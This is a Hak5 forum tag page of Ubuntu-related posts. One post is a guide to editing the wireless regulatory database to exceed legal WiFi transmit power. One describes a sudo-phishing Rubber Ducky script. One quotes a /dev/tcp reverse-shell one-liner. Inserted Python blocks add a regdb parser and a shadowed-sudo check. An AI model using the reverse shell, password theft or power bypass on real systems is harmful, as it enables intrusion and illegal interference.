Hak5 Forums

Showing results for tags 'ubuntu'.

Found 9 results

  1. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category.

    Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage).

    *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu: https://github.com/hiruna/wifi-txpower-unlocker

    Working directory: /root

    Steps:

    1. Update and upgrade
        apt-get update
        apt-get upgrade

    2. Install dependencies to compile
        apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential

    3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database. I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz
        wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz
        wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz

    4. Unzip the downloaded files
        tar xvJf crda-3.18.tar.xz
        tar xvJf wireless-regdb-2017.03.07.tar.xz

    5. Navigate into wireless-regdb-2017.03.07
        cd wireless-regdb-2017.03.07

    6. Open db.txt and locate the region BO section
        nano db.txt
    You will see something like this:
        country BO: DFS-JP
            (2402 - 2482 @ 40), (30)
            (5250 - 5330 @ 80), (30), DFS
            (5735 - 5835 @ 80), (30)
    The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file:
        country BO: DFS-JP
            (2402 - 2482 @ 40), (33)
            (5250 - 5330 @ 80), (30), DFS
            (5735 - 5835 @ 80), (30)
    I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO:
        country AU: DFS-ETSI
            (2400 - 2483.5 @ 40), (36)
            (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW
            (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS
            (5470 - 5600 @ 80), (27), DFS
            (5650 - 5730 @ 80), (27), DFS
            (5730 - 5850 @ 80), (36)
            (57000 - 66000 @ 2160), (43), NO-OUTDOOR
    However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm:
        country AU: DFS-ETSI
            (2402 - 2482 @ 40), (N/A, 20), (N/A)
            (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW
            (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW
            (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS
            (5735 - 5835 @ 80), (N/A, 30), (N/A)
    So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed.

    7. Compile
        make

    8. Back up your old regulatory.bin file and move the new file into /lib/crda
        mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old
        mv regulatory.bin /lib/crda
    As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys:
        sforshee.key.pub.pem
        linville.key.pub.pem

    9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer:
        cp root.key.pub.pem ../crda-3.18/pubkeys/
        cp sforshee.key.pub.pem ../crda-3.18/pubkeys/
    I found that there are two other pubkeys located at /lib/crda:
        -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem
        -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem
        -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem
    So I copied them too (wasn't too sure whether I needed to copy them):
        cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/
        cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/

    10. Navigate into crda-3.18 and open the Makefile
        cd ../crda-3.18
        nano Makefile
    In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin:
        REG_BIN?=/lib/crda/regulatory.bin

    11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors):
        CFLAGS += -std=gnu99 -Wall -pedantic

    12. Compile
        make clean
        make
        make install
    That's it! I rebooted my Raspberry Pi after compiling.
        reboot

    13. Now let's change the region and set the txpower to 33dBm:
        ifconfig wlan1 down
        iw reg set BO
        iwconfig wlan1 txpower 33
        ifconfig wlan1 up
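    A small parser for the db.txt rule format the post quotes (and for the "(N/A, 20)" column form that iw reg get prints), added here as an example rather than code from the post, the linked scripts or wireless-regdb; it lets you read back what limit a domain actually grants at a given frequency before and after an edit. SAMPLE_DB, parse_regdb and max_txpower are constructed for this example; the frequency and power values are copied from the blocks quoted above.

```python
import re

# Constructed sample in the db.txt format quoted above: BO after the 33 dBm edit, AU unmodified.
SAMPLE_DB = """
country BO: DFS-JP
\t(2402 - 2482 @ 40), (33)
\t(5250 - 5330 @ 80), (30), DFS
\t(5735 - 5835 @ 80), (30)
country AU: DFS-ETSI
\t(2400 - 2483.5 @ 40), (36)
\t(5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW
\t(5730 - 5850 @ 80), (36)
"""

COUNTRY_RE = re.compile(r"^country\s+([A-Z0-9]{2}):")
# One rule: "(lo - hi @ bw), (max-eirp), FLAGS"; the optional "N/A, " also accepts
# the "(N/A, 20)" column that `iw reg get` prints for the live kernel regdb.
RULE_RE = re.compile(
    r"^\s*\((?P<lo>[\d.]+)\s*-\s*(?P<hi>[\d.]+)\s*@\s*(?P<bw>[\d.]+)\)\s*,\s*"
    r"\((?:N/A\s*,\s*)?(?P<pwr>[\d.]+)\)(?P<rest>.*)$"
)

def parse_regdb(text):
    """Map alpha2 -> list of rules {lo, hi, bw, max_dbm, flags} (MHz, dBm)."""
    db, current = {}, None
    for line in text.splitlines():
        m = COUNTRY_RE.match(line)
        if m:
            current = m.group(1)
            db[current] = []
            continue
        m = RULE_RE.match(line)
        if m and current is not None:
            # Keep word flags (DFS, AUTO-BW, ...); drop "(N/A)" / "(0 ms)" columns.
            flags = [f.strip() for f in m.group("rest").split(",")]
            flags = [f for f in flags if f and not f.startswith("(")]
            db[current].append({"lo": float(m.group("lo")), "hi": float(m.group("hi")),
                                "bw": float(m.group("bw")),
                                "max_dbm": float(m.group("pwr")), "flags": flags})
    return db

def max_txpower(db, alpha2, freq_mhz):
    """Highest permitted EIRP in dBm for freq_mhz under domain alpha2, or None."""
    rules = [r for r in db.get(alpha2, []) if r["lo"] <= freq_mhz <= r["hi"]]
    return max(r["max_dbm"] for r in rules) if rules else None

if __name__ == "__main__":
    db = parse_regdb(SAMPLE_DB)
    for cc in db:  # 2.4 GHz channel 6 (2437 MHz) under each domain
        print(cc, max_txpower(db, cc, 2437), "dBm")
```

    Running it over the real db.txt next to the output of iw reg get is a quick way to see whether the kernel is still loading an older regulatory.bin than the one you compiled.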
  2. I would just like to preface by saying that I won't be here to read or respond to comments. I apologize for that, but I am spending as much time as I can focusing on research and learning everything I can. This is a time I would consider to be my intellectual prime and I really want to use this time as best I can in that regard, so I hope you can understand why I won't be actively engaging as a user in general. https://medium.com/@ViGrey/phishing-for-root-using-shell-functions-against-mac-and-linux-2b1b7edbb9a9 This is a script that pretends to be sudo and /usr/bin/sudo, acts like the password prompt, steals the password and deletes traces of itself, including the shell history of running the script itself. The specific ducky script in this post is for Ubuntu with Unity, but it could easily be tweaked to work with other desktops, distros, and even Mac OS X. The idea for this came when I was in the early stages of the research project I'm currently working on involving U2F security tokens (I'll make a post here about that later after I get a POC and blog post up). After testing out some commands for the project, the thought "Could I alias sudo?" came to mind and I decided to try it. Sure enough, it worked flawlessly. I then checked to see if I could alias sudo and call sudo at the end, essentially injecting commands into sudo. That worked flawlessly as well. Figuring these things out opened more questions and I ended up in a rabbit hole thinking about what I could do with it. After getting some other work done, I decided to start working on the ideas about 2 or 3 days ago after figuring out the same can be said about shell functions as aliases and came up with this. The ducky script is in the blog post, but also at https://gist.github.com/ViGrey/a988c76c87898a2156da7724c57f16b4#file-rootphisher-ducky. Go ahead and tinker with it; make it better. 
    I know there are probably better ways to handle some edge cases that can arise, but I leave that as an exercise for you all and possibly myself in the future to look at. I just had fun working on this. Apologies for any confusing parts or spelling errors in the blog post. I wrote that post in a bit of a rush so I could get back to my current research project. Have fun with it!
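    A defender-side check for the shadowing the post relies on, added here as an example and not taken from the post author's script or gist: scan a shell startup file for alias or function definitions whose name collides with sudo or another command that prompts for a secret. ALIAS_RE, FUNC_RE, WATCH, find_shadows and the sample .bashrc fragment are all constructed for this example.

```python
import re

# Shell-startup definitions that can shadow a command (the post above does this
# with a function named sudo).  Matches "alias NAME=" and both function forms.
ALIAS_RE = re.compile(r"^\s*alias\s+(?P<name>[\w.-]+)\s*=")
FUNC_RE = re.compile(
    r"^\s*(?:function\s+(?P<name1>[\w.-]+)\s*(?:\(\s*\))?|(?P<name2>[\w.-]+)\s*\(\s*\))"
)

# Constructed watch list: commands that prompt for secrets or elevate privilege.
WATCH = {"sudo", "su", "ssh", "passwd", "gpg"}

def find_shadows(rc_text, watch=WATCH):
    """Return [(line_no, kind, name, line)] for every alias or function in rc_text
    whose name collides with an entry in `watch`.  Trailing '#' comments are
    ignored; a '#' inside quotes is not handled (constructed rc files only)."""
    hits = []
    for n, line in enumerate(rc_text.splitlines(), 1):
        code = line.split("#", 1)[0]
        m = ALIAS_RE.match(code)
        if m and m.group("name") in watch:
            hits.append((n, "alias", m.group("name"), line.strip()))
            continue
        m = FUNC_RE.match(code)
        if m:
            name = m.group("name1") or m.group("name2")
            if name in watch:
                hits.append((n, "function", name, line.strip()))
    return hits

# Constructed ~/.bashrc fragment: two benign definitions, two that shadow sudo.
SAMPLE_BASHRC = """alias ll='ls -alF'
alias sudo='sudo '   # widely used so aliases expand after sudo; still worth review
extract() { tar xf "$1"; }
function sudo () {
    :  # body omitted in this constructed sample
}
"""

if __name__ == "__main__":
    for n, kind, name, text in find_shadows(SAMPLE_BASHRC):
        print(f"line {n}: {kind} shadows {name!r}: {text}")
```

    In a live bash session, type -t sudo printing anything other than file means the name is already resolved to an alias, function or builtin before /usr/bin/sudo is reached.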
  3. Hello, I just got my Rubber Ducky and started toying with it, but can't get the desired outcome on my Ubuntu Xenial machine.

    System: Ubuntu 16.04 Xenial 4.4.0-70-generic
    Compile Steps: Deleted inject.bin, ran java -jar /path/to/duckencode.jar -i hello.txt, created an inject.bin.

    Script:
        REM Description: Open "Run a Command", run gnome-terminal
        DELAY 3000
        ALT F2
        DELAY 1500
        STRING gnome-terminal
        DELAY 750
        STRING echo Hello World
        ENTER

    Outcome: The ALT F2 part of the script is not working; the delays, the string inputs and enter keys are working.
    Test: Opened gEdit, focused the window and replayed payload.
    Output:
        gnome-terminal echo Hello World
    Expectation: Gnome Terminal to open, focused, and write echo Hello World then return key.

    Alternative: Tried CTRL ALT t, without STRING gnome-terminal ENTER, and it does not work either.

    Alt Script:
        REM Description: Open Terminal
        DELAY 3000
        CTRL ALT t
        DELAY 1500
        STRING echo Hello World
        ENTER

    Test: Opened gEdit, focused the window and replayed payload.
    Output:
        echo Hello World
    Expectation: Gnome Terminal to open, focused, and write echo Hello World then return key. No Gnome Terminal opened, it just did STRING echo Hello World ENTER in gEdit.

    Is there something I am doing wrong? Is there something I should know? Any help or suggestions would be appreciated. I will be switching over to Windows tomorrow, but just thought this was odd and worth mentioning for Ubuntu 16.04.
  4. Bought an alfa awus036nh and loaded up ubuntu 16.04 lts on a thinkpad 420. BUT the thinkpad wireless gets me a better signal than the alfa??? I noted the power readings from fluxion using both wireless adapters in the same location. ALSO I can't seem to up the TX on the alfa at all. Is there a problem with Ubuntu drivers and this usb wireless adapter? I thought it was supposed to be pretty well respected for hacking? I found a few discussions on this topic that led me to believe that the current standard drivers in ubuntu 16.04 weren't the correct ones BUT they all seem to disagree on which to install. Thanks for any pointers.
  5. Dropping Connection Sharing

    So I am running the BB script to bring my bunny online via Ubuntu 16 server. I can run it and gain access, but after like 10 mins it drops the connection and I lose the shared interface in my networking setup. I can ssh fine, and then after 10 mins I lose the sessions and it drops the connection. I'm not running any network manager to be interrupting the connection; has anyone else seen this?
  6. Permission Denied (publickey)

    I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan Turtle today. Plugged it in with a phone charger meeting minimum power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to set up the network connection manually (on Ubuntu 16.10) with: IP -, Netmask -, Gateway -, DNS Servers - and After that, I check the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle.
        :$ ssh root@
        Permission denied (publickey).
    I have set up openssh on a few of my PCs for ssh-key authentication only, but this is the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I cannot find anything.
  7. Metasploit Error

    Whenever I type the following:
        pc@pc-eME732Z ~/Downloads/metasploit-framework-master $ msfconsole
        /var/lib/gems/2.3.0/gems/activesupport- `require': cannot load such file -- robots (LoadError)
            from /var/lib/gems/2.3.0/gems/activesupport- `block in require'
            from /var/lib/gems/2.3.0/gems/activesupport- `load_dependency'
            from /var/lib/gems/2.3.0/gems/activesupport- `require'
            from /opt/metasploit-framework/lib/metasploit/framework.rb:18:in `<top (required)>'
            from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'
            from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'
            from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'
            from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'
            from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `require'
            from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'
            from /var/lib/gems/2.3.0/gems/activesupport- `require'
            from /var/lib/gems/2.3.0/gems/activesupport- `const_get'
            from /var/lib/gems/2.3.0/gems/activesupport- `block in constantize'
            from /var/lib/gems/2.3.0/gems/activesupport- `each'
            from /var/lib/gems/2.3.0/gems/activesupport- `inject'
            from /var/lib/gems/2.3.0/gems/activesupport- `constantize'
            from /var/lib/gems/2.3.0/gems/activesupport- `constantize'
            from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'
            from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'
            from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'
            from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'
            from /usr/local/bin/msfconsole:48:in `<main>'
    Please help !!! I use Linux Mint 32 bit
  8. Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?
  9. lanturtle on Ubuntu

    So did the first update all ok, runs ok on my windows box, however I attached the turtle to an Ubuntu box and when I do ifconfig I don't see eth1, just my normal eth0. Any follow-up on how to make this thing work? For some reason I am able to ping the lanturtle IP, but can't ssh into it (connection refused) from my windows box. Help would be deeply appreciated. Thanks guys